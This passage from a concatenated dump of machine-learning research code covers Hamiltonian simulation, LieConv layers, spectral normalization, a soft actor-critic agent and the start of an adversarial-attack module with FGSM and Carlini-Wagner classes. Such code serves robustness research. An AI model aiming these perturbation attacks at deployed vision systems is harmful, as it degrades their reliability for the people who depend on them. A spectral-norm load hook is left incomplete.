energy = barrier(separation[touching]-sum_r[touching])
for i in range(q.shape[-1]):
ld = q[:,:,i]+1-r
rd = 1-q[:,:,i]-r
energy += barrier(ld[ld<thresh])+barrier(rd[rd<thresh])
return energy
def BallH(z,m,r):
D = z.shape[-1] # of ODE dims, 2*num_particles*space_dim
q = z[:,:D//2].reshape(*m.shape,-1)
p = z[:,D//2:].reshape(*m.shape,-1)
return EuclideanK(p,m) + BallV(q,r)
# TODO:
# Make animation plots look nicer. Why are there leftover points on the trails?
class Animation2d(object):
def __init__(self, qt, ms=None, box_lim=(-1, 1)):
if ms is None: ms = len(qt)*[6]
self.qt = qt
self.fig = plt.figure()
self.ax = self.fig.add_axes([0, 0, 1, 1])#axes(projection='3d')
self.ax.set_xlim(box_lim)
self.ax.set_ylim(box_lim)
self.lines = sum([self.ax.plot([],[],'-') for particle in self.qt],[])
self.pts = sum([self.ax.plot([],[],'o',ms=ms[i]) for i in range(len(self.qt))],[])
def init(self):
for line,pt in zip(self.lines,self.pts):
line.set_data([], [])
pt.set_data([], [])
return self.lines + self.pts
def update(self,i=0):
for line, pt, trajectory in zip(self.lines,self.pts,self.qt):
x,y = trajectory[:,:i]
line.set_data(x,y)
pt.set_data(x[-1:], y[-1:])
#self.fig.clear()
self.fig.canvas.draw()
return self.lines+self.pts
def animate(self):
return animation.FuncAnimation(self.fig,self.update,frames=self.qt.shape[-1],
interval=33,init_func=self.init,blit=True)
class Animation3d(object):
def __init__(self,qt,ms=None, box_lim=(-1, 1)):
if ms is None: ms = len(qt)*[6]
self.qt = qt
self.fig = plt.figure()
self.ax = self.fig.add_axes([0, 0, 1, 1],projection='3d')#axes(projection='3d')
self.ax.set_xlim3d(box_lim)
self.ax.set_ylim3d(box_lim)
self.ax.set_zlim3d(box_lim)
self.lines = sum([self.ax.plot([],[],[],'-') for _ in self.qt],[])
self.pts = sum([self.ax.plot([],[],[],'o',ms=ms[i]) for i in range(len(self.qt))],[])
def init(self):
for line,pt in zip(self.lines,self.pts):
line.set_data([], [])
line.set_3d_properties([])
pt.set_data([], [])
pt.set_3d_properties([])
return self.lines + self.pts
def update(self,i=0):
for line, pt, trajectory in zip(self.lines,self.pts,self.qt):
x,y,z = trajectory[:,:i]
line.set_data(x,y)
line.set_3d_properties(z)
pt.set_data(x[-1:], y[-1:])
pt.set_3d_properties(z[-1:])
#self.fig.clear()
self.fig.canvas.draw()
return self.lines+self.pts
def animate(self):
return animation.FuncAnimation(self.fig,self.update,frames=self.qt.shape[-1],
interval=33,init_func=self.init,blit=True)
def AnimationNd(n):
if n==2: return Animation2d
elif n==3: return Animation3d
else: assert False, "No animation for d={}".format(n)
```
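`HamiltonianDynamics` only returns the symplectic gradient dz/dt, so any integrator can be driven with it. A minimal sketch that rolls out the spring system defined by `SpringH` with explicit Euler steps; the system sizes, step size, and step count below are arbitrary.

```python
import torch

bs, n, d = 1, 3, 2                      # one system of 3 particles in 2-D
m = torch.ones(bs, n)                   # unit masses
k = torch.ones(bs, n)                   # spring constants
q0, p0 = torch.randn(bs, n, d), torch.zeros(bs, n, d)
z = torch.cat([q0.reshape(bs, -1), p0.reshape(bs, -1)], dim=-1)  # (bs, 2*n*d)

dynamics = HamiltonianDynamics(lambda t, z: SpringH(z, m, k), wgrad=False)
dt = 1e-3
for _ in range(1000):
    z = z + dt * dynamics(torch.tensor(0.0), z)   # explicit Euler step

# Energy should stay roughly constant for small dt (plain Euler drifts slowly).
print(SpringH(z, m, k).item())
```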
#### File: base/lie_conv/masked_batchnorm.py
```python
import torch
import torch.nn as nn
class MaskBatchNormNd(nn.BatchNorm1d):
""" n-dimensional batchnorm that excludes points outside the mask from the statistics"""
def forward(self, inp):
"""input _, (*, c), (*,) computes statistics averaging over * within the mask"""
coords,x,mask = inp
sum_dims = list(range(len(x.shape[:-1])))
x_or_zero = torch.where(mask.unsqueeze(-1),x,torch.zeros_like(x)) #remove nans
if self.training or not self.track_running_stats:
xsum = x_or_zero.sum(dim=sum_dims)
xxsum = (x_or_zero*x_or_zero).sum(dim=sum_dims)
numel_notnan = (mask).sum()
xmean = xsum / numel_notnan
sumvar = xxsum - xsum * xmean
unbias_var = sumvar / (numel_notnan - 1)
bias_var = sumvar / numel_notnan
self.running_mean = (
(1 - self.momentum) * self.running_mean
+ self.momentum * xmean.detach())
self.running_var = (
(1 - self.momentum) * self.running_var
+ self.momentum * unbias_var.detach())
else:
xmean, bias_var = self.running_mean,self.running_var
std = bias_var.clamp(self.eps) ** 0.5
ratio = self.weight/std
output = (x_or_zero*ratio + (self.bias - xmean*ratio))
return (coords,output,mask)
```
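`MaskBatchNormNd` consumes `(coords, values, mask)` tuples so that padded points are excluded from the batch statistics. A small usage sketch with made-up shapes:

```python
import torch

bn = MaskBatchNormNd(8)                      # 8 channels
coords = torch.randn(2, 5, 3)                # (batch, points, spatial dim)
x = torch.randn(2, 5, 8)                     # (batch, points, channels)
mask = torch.tensor([[True, True, True, False, False],
                     [True, True, True, True, True]])
coords_out, x_out, mask_out = bn((coords, x, mask))
print(x_out.shape)                           # torch.Size([2, 5, 8])
```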
#### File: base/lie_conv/moleculeTrainer.py
```python
import torch
import torch.nn as nn
from oil.model_trainers import Trainer
from lie_conv.lieConv import PointConv, Pass, Swish, GlobalPool
from lie_conv.lieConv import norm, LieResNet, BottleBlock
from lie_conv.utils import export, Named
from lie_conv.datasets import SO3aug, SE3aug
from lie_conv.lieGroups import SE3
import numpy as np
@export
class MoleculeTrainer(Trainer):
def __init__(self, *args, task='cv', ds_stats=None, **kwargs):
super().__init__(*args,**kwargs)
self.hypers['task'] = task
self.ds_stats = ds_stats
if hasattr(self.lr_schedulers[0],'setup_metrics'): #setup lr_plateau if exists
self.lr_schedulers[0].setup_metrics(self.logger,'valid_MAE')
def loss(self, minibatch):
y = self.model(minibatch)
target = minibatch[self.hypers['task']]
if self.ds_stats is not None:
median, mad = self.ds_stats
target = (target - median) / mad
return (y-target).abs().mean()
def metrics(self, loader):
task = self.hypers['task']
#mse = lambda mb: ((self.model(mb)-mb[task])**2).mean().cpu().data.numpy()
if self.ds_stats is not None:
median, mad = self.ds_stats
def mae(mb):
target = mb[task]
y = self.model(mb) * mad + median
return (y-target).abs().mean().cpu().data.numpy()
else:
mae = lambda mb: (self.model(mb)-mb[task]).abs().mean().cpu().data.numpy()
return {'MAE': self.evalAverageMetrics(loader,mae)}
def logStuff(self,step,minibatch=None):
super().logStuff(step,minibatch)
@export
class MolecLieResNet(LieResNet):
def __init__(self, num_species, charge_scale, aug=False, group=SE3, **kwargs):
super().__init__(chin=3*num_species,num_outputs=1,group=group,ds_frac=1,**kwargs)
self.charge_scale = charge_scale
self.aug =aug
self.random_rotate = SE3aug()#RandomRotation()
def featurize(self, mb):
charges = mb['charges'] / self.charge_scale
c_vec = torch.stack([torch.ones_like(charges),charges,charges**2],dim=-1) #
one_hot_charges = (mb['one_hot'][:,:,:,None]*c_vec[:,:,None,:]).float().reshape(*charges.shape,-1)
atomic_coords = mb['positions'].float()
atom_mask = mb['charges']>0
#print('orig_mask',atom_mask[0].sum())
return (atomic_coords, one_hot_charges, atom_mask)
def forward(self,mb):
with torch.no_grad():
x = self.featurize(mb)
x = self.random_rotate(x) if self.aug else x
return super().forward(x).squeeze(-1)
```
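The one-line feature construction in `MolecLieResNet.featurize` packs, for every atom, its one-hot species vector scaled by (1, q, q^2) of the normalized charge q, giving `3 * num_species` channels. A standalone sketch of just that expansion, with made-up sizes:

```python
import torch
import torch.nn.functional as F

bs, n_atoms, num_species, charge_scale = 2, 4, 5, 9.0
charges = torch.randint(0, 10, (bs, n_atoms)).float()
one_hot = F.one_hot(torch.randint(0, num_species, (bs, n_atoms)), num_species).float()

q = charges / charge_scale
c_vec = torch.stack([torch.ones_like(q), q, q ** 2], dim=-1)             # (bs, n, 3)
features = (one_hot[:, :, :, None] * c_vec[:, :, None, :]).reshape(bs, n_atoms, -1)
print(features.shape)                                                    # (2, 4, 15)
```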
#### File: layers/base/spectral.py
```python
import torch
import torch.nn.functional as F
class SpectralNormConv(object):
# Invariant before and after each forward call:
# u = normalize(W @ v)
# NB: At initialization, this invariant is not enforced
_version = 1
# At version 1:
# made `W` not a buffer,
# added `v` as a buffer, and
# made eval mode use `W = u @ W_orig @ v` rather than the stored `W`.
def __init__(self, coeff, input_dim, name='weight', n_power_iterations=1,
eps=1e-12):
self.coeff = coeff
self.input_dim = input_dim
self.name = name
if n_power_iterations <= 0:
raise ValueError('Expected n_power_iterations to be positive, but '
'got n_power_iterations={}'.format(
n_power_iterations))
self.n_power_iterations = n_power_iterations
self.eps = eps
def compute_weight(self, module, do_power_iteration):
# NB: If `do_power_iteration` is set, the `u` and `v` vectors are
# updated in power iteration **in-place**. This is very important
# because in `DataParallel` forward, the vectors (being buffers) are
# broadcast from the parallelized module to each module replica,
# which is a new module object created on the fly. And each replica
# runs its own spectral norm power iteration. So simply assigning
# the updated vectors to the module this function runs on will cause
# the update to be lost forever. And the next time the parallelized
# module is replicated, the same randomly initialized vectors are
# broadcast and used!
#
# Therefore, to make the change propagate back, we rely on two
        # important behaviors (also enforced via tests):
# 1. `DataParallel` doesn't clone storage if the broadcast tensor
        #    is already on the correct device; and it makes sure that the
# parallelized module is already on `device[0]`.
# 2. If the out tensor in `out=` kwarg has correct shape, it will
# just fill in the values.
# Therefore, since the same power iteration is performed on all
# devices, simply updating the tensors in-place will make sure that
# the module replica on `device[0]` will update the _u vector on the
        # parallelized module (by shared storage).
#
# However, after we update `u` and `v` in-place, we need to **clone**
# them before using them to normalize the weight. This is to support
# backproping through two forward passes, e.g., the common pattern in
# GAN training: loss = D(real) - D(fake). Otherwise, engine will
# complain that variables needed to do backward for the first forward
# (i.e., the `u` and `v` vectors) are changed in the second forward.
weight = getattr(module, self.name + '_orig')
u = getattr(module, self.name + '_u')
v = getattr(module, self.name + '_v')
sigma_log = getattr(module, self.name + '_sigma') # for logging
# get settings from conv-module (for transposed convolution)
stride = module.stride
padding = module.padding
if do_power_iteration:
with torch.no_grad():
for _ in range(self.n_power_iterations):
v_s = F.conv_transpose2d(u.view(self.out_shape), weight,
stride=stride,
padding=padding, output_padding=0)
# Note: out flag for in-place changes
v = F.normalize(v_s.view(-1), dim=0, eps=self.eps, out=v)
u_s = F.conv2d(
v.view(self.input_dim), weight, stride=stride,
padding=padding,
bias=None)
u = F.normalize(u_s.view(-1), dim=0, eps=self.eps, out=u)
if self.n_power_iterations > 0:
# See above on why we need to clone
u = u.clone()
v = v.clone()
weight_v = F.conv2d(
v.view(self.input_dim),
weight, stride=stride,
padding=padding,
bias=None)
weight_v = weight_v.view(-1)
sigma = torch.dot(u.view(-1), weight_v)
# enforce spectral norm only as constraint
factorReverse = torch.max(torch.ones(1).to(weight.device),
sigma / self.coeff)
# for logging
weight_v_det = weight_v.detach()
u_det = u.detach()
torch.max(torch.dot(u_det.view(-1), weight_v_det),
torch.dot(u_det.view(-1), weight_v_det), out=sigma_log)
# rescaling
weight = weight / (factorReverse + 1e-5) # for stability
return weight
def remove(self, module):
with torch.no_grad():
weight = self.compute_weight(module, do_power_iteration=False)
delattr(module, self.name)
delattr(module, self.name + '_u')
delattr(module, self.name + '_orig')
module.register_parameter(self.name,
torch.nn.Parameter(weight.detach()))
def __call__(self, module, inputs):
setattr(module, self.name,
self.compute_weight(module, do_power_iteration=module.training))
@staticmethod
def apply(module, coeff, input_dim, name, n_power_iterations, eps):
for k, hook in module._forward_pre_hooks.items():
if isinstance(hook, SpectralNormConv) and hook.name == name:
raise RuntimeError("Cannot register two spectral_norm hooks on "
"the same parameter {}".format(name))
fn = SpectralNormConv(coeff, input_dim, name, n_power_iterations, eps)
weight = module._parameters[name]
with torch.no_grad():
num_input_dim = input_dim[0] * input_dim[1] * input_dim[2] * \
input_dim[3]
v = F.normalize(torch.randn(num_input_dim), dim=0, eps=fn.eps)
# get settings from conv-module (for transposed convolution)
stride = module.stride
padding = module.padding
# forward call to infer the shape
u = F.conv2d(
v.view(input_dim), weight, stride=stride,
padding=padding,
bias=None)
fn.out_shape = u.shape
num_output_dim = fn.out_shape[0] * fn.out_shape[1] * fn.out_shape[
2] * fn.out_shape[3]
# overwrite u with random init
u = F.normalize(torch.randn(num_output_dim), dim=0, eps=fn.eps)
delattr(module, fn.name)
module.register_parameter(fn.name + "_orig", weight)
setattr(module, fn.name, weight.data)
module.register_buffer(fn.name + "_u", u)
module.register_buffer(fn.name + "_v", v)
module.register_buffer(fn.name + "_sigma",
torch.ones(1).to(weight.device))
module.register_forward_pre_hook(fn)
module._register_state_dict_hook(SpectralNormConvStateDictHook(fn))
module._register_load_state_dict_pre_hook(
SpectralNormConvLoadStateDictPreHook(fn))
return fn
class SpectralNormConvLoadStateDictPreHook(object):
# See docstring of SpectralNorm._version on the changes to spectral_norm.
def __init__(self, fn):
self.fn = fn
# For state_dict with version None, (assuming that it has gone through at
# least one training forward), we have
#
# u = normalize(W_orig @ v)
# W = W_orig / sigma, where sigma = u @ W_orig @ v
#
# To compute `v`, we solve `W_orig @ x = u`, and let
# v = x / (u @ W_orig @ x) * (W / W_orig).
def __call__(self, state_dict, prefix, local_metadata, strict,
missing_keys, unexpected_keys, error_msgs):
fn = self.fn
version = local_metadata.get('spectral_norm_conv', {}).get(
fn.name + '.version', None)
if version is None or version < 1:
with torch.no_grad():
weight_orig = state_dict[prefix + fn.name + '_orig']
weight = state_dict.pop(prefix + fn.name)
sigma = (weight_orig / weight).mean()
weight_mat = fn.reshape_weight_to_matrix(weight_orig)
u = state_dict[prefix + fn.name + '_u']
class SpectralNormConvStateDictHook(object):
# See docstring of SpectralNorm._version on the changes to spectral_norm.
def __init__(self, fn):
self.fn = fn
def __call__(self, module, state_dict, prefix, local_metadata):
if 'spectral_norm_conv' not in local_metadata:
local_metadata['spectral_norm_conv'] = {}
key = self.fn.name + '.version'
if key in local_metadata['spectral_norm_conv']:
raise RuntimeError(
"Unexpected key in metadata['spectral_norm_conv']: {}".format(
key))
local_metadata['spectral_norm_conv'][key] = self.fn._version
def spectral_norm_conv(module, coeff, input_dim, name='weight',
n_power_iterations=1, eps=1e-12):
r"""Applies spectral normalization to a parameter in the given module.
.. math::
\mathbf{W} = \dfrac{\mathbf{W}}{\sigma(\mathbf{W})} \\
\sigma(\mathbf{W}) = \max_{\mathbf{h}: \mathbf{h} \ne 0} \dfrac{\|\mathbf{W} \mathbf{h}\|_2}{\|\mathbf{h}\|_2}
Spectral normalization stabilizes the training of discriminators (critics)
    in Generative Adversarial Networks (GANs) by rescaling the weight tensor
with spectral norm :math:`\sigma` of the weight matrix calculated using
power iteration method. If the dimension of the weight tensor is greater
than 2, it is reshaped to 2D in power iteration method to get spectral
norm. This is implemented via a hook that calculates spectral norm and
rescales weight before every :meth:`~Module.forward` call.
See `Spectral Normalization for Generative Adversarial Networks`_ .
.. _`Spectral Normalization for Generative Adversarial Networks`: https://arxiv.org/abs/1802.05957
Args:
module (nn.Module): containing module
name (str, optional): name of weight parameter
n_power_iterations (int, optional): number of power iterations to
            calculate spectral norm
eps (float, optional): epsilon for numerical stability in
calculating norms
dim (int, optional): dimension corresponding to number of outputs,
the default is 0, except for modules that are instances of
ConvTranspose1/2/3d, when it is 1
Returns:
        The original module with the spectral norm hook
Example::
>>> m = spectral_norm(nn.Linear(20, 40))
Linear (20 -> 40)
>>> m.weight_u.size()
torch.Size([20])
"""
input_dim_4d = (1, input_dim[0], input_dim[1], input_dim[2])
SpectralNormConv.apply(module, coeff, input_dim_4d, name,
n_power_iterations, eps)
return module
def remove_spectral_norm_conv(module, name='weight'):
r"""Removes the spectral normalization reparameterization from a module.
Args:
module (nn.Module): containing module
name (str, optional): name of weight parameter
Example:
>>> m = spectral_norm(nn.Linear(40, 10))
>>> remove_spectral_norm(m)
"""
for k, hook in module._forward_pre_hooks.items():
if isinstance(hook, SpectralNormConv) and hook.name == name:
hook.remove(module)
del module._forward_pre_hooks[k]
return module
raise ValueError("spectral_norm of '{}' not found in {}".format(
name, module))
``` |
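`spectral_norm_conv` registers a forward pre-hook that rescales the convolution weight whenever its estimated spectral norm exceeds `coeff`. A usage sketch on a plain `nn.Conv2d`; the channel and spatial sizes are arbitrary, and `input_dim` is the `(C, H, W)` shape of the activations fed to the layer:

```python
import torch
import torch.nn as nn

conv = nn.Conv2d(16, 32, kernel_size=3, padding=1)
conv = spectral_norm_conv(conv, coeff=0.97, input_dim=(16, 8, 8))

x = torch.randn(4, 16, 8, 8)
y = conv(x)                        # the pre-hook rescales the weight before the call
print(y.shape, conv.weight_sigma)  # the estimated sigma is kept in a buffer
```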
{
"source": "joeybose/FloRL",
"score": 2
} |
#### File: FloRL/pytorch-soft-actor-critic/sac.py
```python
import sys
import os
import numpy as np
import torch
import torch.nn.functional as F
import torch.nn as nn
from torch.optim import Adam
from utils import soft_update, hard_update
from model import GaussianPolicy, ExponentialPolicy, LogNormalPolicy, LaplacePolicy, QNetwork, ValueNetwork, DeterministicPolicy
from flows import *
import ipdb
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class SAC(object):
def __init__(self, num_inputs, action_space, args):
self.num_inputs = num_inputs
self.action_space = action_space.shape[0]
self.gamma = args.gamma
self.tau = args.tau
self.clip = args.clip
self.policy_type = args.policy
self.target_update_interval = args.target_update_interval
self.automatic_entropy_tuning = args.automatic_entropy_tuning
self.critic = QNetwork(self.num_inputs, self.action_space,\
args.hidden_size).to(device)
self.critic_optim = Adam(self.critic.parameters(), lr=args.lr)
self.alpha = args.alpha
self.tanh = args.tanh
self.reparam = args.reparam
if self.policy_type == "Gaussian" or self.policy_type == "Exponential" or self.policy_type == "LogNormal" or self.policy_type == "Laplace":
# Target Entropy = −dim(A) (e.g. , -6 for HalfCheetah-v2) as given in the paper
if self.automatic_entropy_tuning == True:
self.target_entropy = -torch.prod(torch.Tensor(action_space.shape)).item()
self.log_alpha = torch.zeros(1, requires_grad=True).to(device)
self.alpha_optim = Adam([self.log_alpha], lr=args.lr)
else:
pass
if self.policy_type == "Gaussian":
self.policy = GaussianPolicy(self.num_inputs, self.action_space,\
args.hidden_size,args).to(device)
elif self.policy_type == "Exponential":
self.policy = ExponentialPolicy(self.num_inputs, self.action_space,\
args.hidden_size,args).to(device)
elif self.policy_type == "LogNormal":
self.policy = LogNormalPolicy(self.num_inputs, self.action_space,\
args.hidden_size,args).to(device)
elif self.policy_type == "Laplace":
self.policy = LaplacePolicy(self.num_inputs, self.action_space,\
args.hidden_size,args).to(device)
self.policy_optim = Adam(self.policy.parameters(), lr=args.lr,weight_decay=1e-6)
self.value = ValueNetwork(self.num_inputs,\
args.hidden_size).to(device)
self.value_target = ValueNetwork(self.num_inputs,\
args.hidden_size).to(device)
self.value_optim = Adam(self.value.parameters(), lr=args.lr)
hard_update(self.value_target, self.value)
elif self.policy_type == "Flow":
if args.flow_model == 'made':
self.policy = MADE(self.action_space,self.num_inputs,args.hidden_size,
args.n_hidden, args.cond_label_size,
args.activation_fn,
args.input_order).to(device)
elif args.flow_model == 'mademog':
assert args.n_components > 1, 'Specify more than 1 component for mixture of gaussians models.'
self.policy = MADEMOG(args.n_components, self.num_inputs,
self.action_space, args.flow_hidden_size,
args.n_hidden, args.cond_label_size,
args.activation_fn,
args.input_order).to(device)
elif args.flow_model == 'maf':
self.policy = MAF(args.n_blocks,self.num_inputs,self.action_space,
args.flow_hidden_size, args.n_hidden,
args.cond_label_size, args.activation_fn,
args.input_order, batch_norm=not
args.no_batch_norm).to(device)
elif args.flow_model == 'mafmog':
assert args.n_components > 1, 'Specify more than 1 component for mixture of gaussians models.'
self.policy = MAFMOG(args.n_blocks,self.num_inputs,args.n_components,
self.action_space, args.flow_hidden_size,
args.n_hidden, args.cond_label_size,
args.activation_fn,args.input_order,
batch_norm=not
args.no_batch_norm).to(device)
elif args.flow_model =='realnvp':
self.policy = RealNVP(args.n_blocks,self.num_inputs,self.action_space,
args.flow_hidden_size,args.n_hidden,
args.cond_label_size,batch_norm=not
args.no_batch_norm).to(device)
elif args.flow_model =='planar':
self.policy = PlanarBase(args.n_blocks,self.num_inputs,self.action_space,
args.flow_hidden_size,args.n_hidden,device).to(device)
else:
raise ValueError('Unrecognized model.')
self.policy_optim = Adam(self.policy.parameters(), lr=args.lr, weight_decay=1e-6)
self.value = ValueNetwork(self.num_inputs,\
args.hidden_size).to(device)
self.value_target = ValueNetwork(self.num_inputs,\
args.hidden_size).to(device)
self.value_optim = Adam(self.value.parameters(), lr=args.lr)
hard_update(self.value_target, self.value)
else:
self.policy = DeterministicPolicy(self.num_inputs, self.action_space, args.hidden_size)
self.policy_optim = Adam(self.policy.parameters(), lr=args.lr)
self.critic_target = QNetwork(self.num_inputs, self.action_space,\
args.hidden_size).to(device)
hard_update(self.critic_target, self.critic)
def select_action(self, state, eval=False):
state = torch.FloatTensor(state).to(device).unsqueeze(0)
if eval == False:
self.policy.train()
if len(state.size()) > 2:
state = state.view(-1,self.num_inputs)
action, _, _, _, _ = self.policy(state, reparam = self.reparam)
else:
self.policy.eval()
if len(state.size()) > 2:
state = state.view(-1,self.num_inputs)
if self.policy_type != 'Flow':
_, _, _, action, _ = self.policy(state, reparam=self.reparam)
else:
_, _, _, action, _ = self.policy.inverse(state)
if self.policy_type == "Gaussian" or self.policy_type == "Exponential" or self.policy_type == "LogNormal" or self.policy_type == "Laplace":
if self.tanh:
action = torch.tanh(action)
elif self.policy_type == "Flow":
if self.tanh:
action = torch.tanh(action)
else:
pass
action = action.detach().cpu().numpy()
return action[0]
def update_parameters(self, state_batch, action_batch, reward_batch, next_state_batch, mask_batch, updates):
state_batch = torch.FloatTensor(state_batch).to(device)
next_state_batch = torch.FloatTensor(next_state_batch).to(device)
action_batch = torch.FloatTensor(action_batch).to(device)
reward_batch = torch.FloatTensor(reward_batch).to(device).unsqueeze(1)
mask_batch = torch.FloatTensor(np.float32(mask_batch)).to(device).unsqueeze(1)
"""
Use two Q-functions to mitigate positive bias in the policy improvement step that is known
to degrade performance of value based methods. Two Q-functions also significantly speed
        up training, especially on harder tasks.
"""
expected_q1_value, expected_q2_value = self.critic(state_batch, action_batch)
if self.policy_type == 'Flow':
new_action, log_prob, _, mean, log_std = self.policy.inverse(state_batch)
else:
new_action, log_prob, _, mean, log_std = self.policy(state_batch, reparam=self.reparam)
if self.policy_type == "Gaussian" or self.policy_type == "Exponential" or self.policy_type == "LogNormal" or self.policy_type == "Laplace" or self.policy_type == 'Flow':
if self.automatic_entropy_tuning:
"""
Alpha Loss
"""
alpha_loss = -(self.log_alpha * (log_prob + self.target_entropy).detach()).mean()
self.alpha_optim.zero_grad()
alpha_loss.backward()
self.alpha_optim.step()
self.alpha = self.log_alpha.exp()
alpha_logs = self.alpha.clone() # For TensorboardX logs
else:
alpha_loss = torch.tensor(0.)
alpha_logs = self.alpha # For TensorboardX logs
"""
Including a separate function approximator for the soft value can stabilize training.
"""
expected_value = self.value(state_batch)
target_value = self.value_target(next_state_batch)
next_q_value = reward_batch + mask_batch * self.gamma * (target_value).detach()
else:
"""
There is no need in principle to include a separate function approximator for the state value.
            We use a target critic network for the deterministic policy and remove the value network entirely.
"""
alpha_loss = torch.tensor(0.)
alpha_logs = self.alpha # For TensorboardX logs
next_state_action, _, _, _, _, = self.policy(next_state_batch, reparam =self.reparam)
target_critic_1, target_critic_2 = self.critic_target(next_state_batch, next_state_action)
target_critic = torch.min(target_critic_1, target_critic_2)
next_q_value = reward_batch + mask_batch * self.gamma * (target_critic).detach()
"""
Soft Q-function parameters can be trained to minimize the soft Bellman residual
JQ = 𝔼(st,at)~D[0.5(Q1(st,at) - r(st,at) - γ(𝔼st+1~p[V(st+1)]))^2]
∇JQ = ∇Q(st,at)(Q(st,at) - r(st,at) - γV(target)(st+1))
"""
q1_value_loss = F.mse_loss(expected_q1_value, next_q_value)
q2_value_loss = F.mse_loss(expected_q2_value, next_q_value)
q1_new, q2_new = self.critic(state_batch, new_action)
expected_new_q_value = torch.min(q1_new, q2_new)
if self.policy_type == "Gaussian" or self.policy_type == "Exponential" or self.policy_type == "LogNormal" or self.policy_type == "Laplace" or self.policy_type == 'Flow':
"""
Including a separate function approximator for the soft value can stabilize training and is convenient to
train simultaneously with the other networks
Update the V towards the min of two Q-functions in order to reduce overestimation bias from function approximation error.
JV = 𝔼st~D[0.5(V(st) - (𝔼at~π[Qmin(st,at) - α * log π(at|st)]))^2]
∇JV = ∇V(st)(V(st) - Q(st,at) + (α * logπ(at|st)))
"""
next_value = expected_new_q_value - (self.alpha * log_prob)
value_loss = F.mse_loss(expected_value, next_value.detach())
else:
pass
# whether to use reparameterization trick or not
if self.reparam == True:
"""
Reparameterization trick is used to get a low variance estimator
f(εt;st) = action sampled from the policy
εt is an input noise vector, sampled from some fixed distribution
Jπ = 𝔼st∼D,εt∼N[α * logπ(f(εt;st)|st) − Q(st,f(εt;st))]
∇Jπ = ∇log π + ([∇at (α * logπ(at|st)) − ∇at Q(st,at)])∇f(εt;st)
"""
policy_loss = ((self.alpha * log_prob) - expected_new_q_value).mean()
else:
log_prob_target = expected_new_q_value - expected_value
policy_loss = (log_prob * ((self.alpha * log_prob) - log_prob_target).detach() ).mean()
# Regularization Loss
if self.policy_type == "Gaussian" or self.policy_type == "Exponential" or self.policy_type == "LogNormal" or self.policy_type == "Laplace":
mean_loss = 0.001 * mean.pow(2).mean()
std_loss = 0.001 * log_std.pow(2).mean()
policy_loss += mean_loss + std_loss
self.critic_optim.zero_grad()
q1_value_loss.backward()
self.critic_optim.step()
self.critic_optim.zero_grad()
q2_value_loss.backward()
self.critic_optim.step()
if self.policy_type == "Gaussian" or self.policy_type == "Exponential" or self.policy_type == "LogNormal" or self.policy_type == "Laplace":
self.value_optim.zero_grad()
value_loss.backward()
self.value_optim.step()
else:
value_loss = torch.tensor(0.)
self.policy_optim.zero_grad()
policy_loss.backward()
if self.policy_type == 'Exponential' or self.policy_type == "LogNormal" or self.policy_type == "Laplace" or self.policy_type == 'Flow':
torch.nn.utils.clip_grad_norm_(self.policy.parameters(),self.clip)
self.policy_optim.step()
        # clip weights of policy network to ensure the values don't blow up
for p in self.policy.parameters():
p.data.clamp_(-10*self.clip, 10*self.clip)
"""
We update the target weights to match the current value function weights periodically
Update target parameter after every n(args.target_update_interval) updates
"""
if updates % self.target_update_interval == 0 and self.policy_type == "Deterministic":
soft_update(self.critic_target, self.critic, self.tau)
elif updates % self.target_update_interval == 0 and (self.policy_type == "Gaussian" or self.policy_type == "Exponential" or self.policy_type == "LogNormal"):
soft_update(self.value_target, self.value, self.tau)
# calculate the entropy
with torch.no_grad():
entropy = -(log_prob.mean())
# ipdb.set_trace() #alpha_loss.item()
return value_loss.item(), q1_value_loss.item(), q2_value_loss.item(), policy_loss.item(),entropy, alpha_logs
# Save model parameters
def save_model(self, env_name, suffix="", actor_path=None, critic_path=None, value_path=None):
if not os.path.exists('models/'):
os.makedirs('models/')
if actor_path is None:
actor_path = "models/sac_actor_{}_{}".format(env_name, suffix)
if critic_path is None:
critic_path = "models/sac_critic_{}_{}".format(env_name, suffix)
if value_path is None:
value_path = "models/sac_value_{}_{}".format(env_name, suffix)
print('Saving models to {}, {} and {}'.format(actor_path, critic_path, value_path))
torch.save(self.value.state_dict(), value_path)
torch.save(self.policy.state_dict(), actor_path)
torch.save(self.critic.state_dict(), critic_path)
# Load model parameters
def load_model(self, actor_path, critic_path, value_path):
print('Loading models from {}, {} and {}'.format(actor_path, critic_path, value_path))
if actor_path is not None:
self.policy.load_state_dict(torch.load(actor_path))
if critic_path is not None:
self.critic.load_state_dict(torch.load(critic_path))
if value_path is not None:
self.value.load_state_dict(torch.load(value_path))
``` |
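The `soft_update()` helper called by the target-update step above is not included in this snippet. Below is a minimal sketch of the usual Polyak-averaging implementation, assuming that is what the helper does (not necessarily the author's exact code):

```python
def soft_update(target, source, tau):
    """Polyak averaging: theta_target <- tau * theta_source + (1 - tau) * theta_target."""
    for t_param, s_param in zip(target.parameters(), source.parameters()):
        t_param.data.copy_(tau * s_param.data + (1.0 - tau) * t_param.data)
```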
{
"source": "joeybose/simple-faster-rcnn-pytorch",
"score": 3
} |
#### File: joeybose/simple-faster-rcnn-pytorch/attacks.py
```python
import torch
import cv2
from utils import array_tool as at
from data.dataset import preprocess,inverse_normalize
import numpy as np
import ipdb
import pdb
from torch.autograd import Variable
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.backends.cudnn as cudnn
import sys
def reduce_sum(x, keepdim=True):
for a in reversed(range(1, x.dim())):
x = x.sum(a, keepdim=keepdim)
return x
def L2_dist(x, y):
return reduce_sum((x - y)**2)
def torch_arctanh(x, eps=1e-6):
x = x * (1. - eps)
return (torch.log((1 + x) / (1 - x))) * 0.5
class FGSM(object):
def __init__(self, epsilon=0.25):
self.epsilon = epsilon
def attack(self, inputs, labels, model, *args):
"""
Given a set of inputs and epsilon, return the perturbed inputs (as Variable objects),
the predictions for the inputs from the model, and the percentage of inputs
        unsuccessfully perturbed (i.e., model accuracy).
        The adversarial inputs are returned as a python list of tensors.
        The predictions are a numpy array of classes, with length equal to the number of inputs.
"""
adv_inputs = inputs.data + self.epsilon * torch.sign(inputs.grad.data)
adv_inputs = torch.clamp(adv_inputs, -1.0, 1.0)
adv_inputs = Variable(adv_inputs, requires_grad=False)
predictions = torch.max(model(adv_inputs).data, 1)[1].cpu().numpy()
num_unperturbed = (predictions == labels.data.cpu().numpy()).sum()
adv_inputs = [ adv_inputs[i] for i in range(inputs.size(0)) ]
return adv_inputs, predictions, num_unperturbed
class CarliniWagner(object):
def __init__(self, confidence=0, learning_rate=1e-3, binary_search_steps=5, max_iterations=1000,
initial_const=1, num_labels=10, clip_min=-1, clip_max=1, verbose=False):
"""
Return a tensor that constructs adversarial examples for the given input.
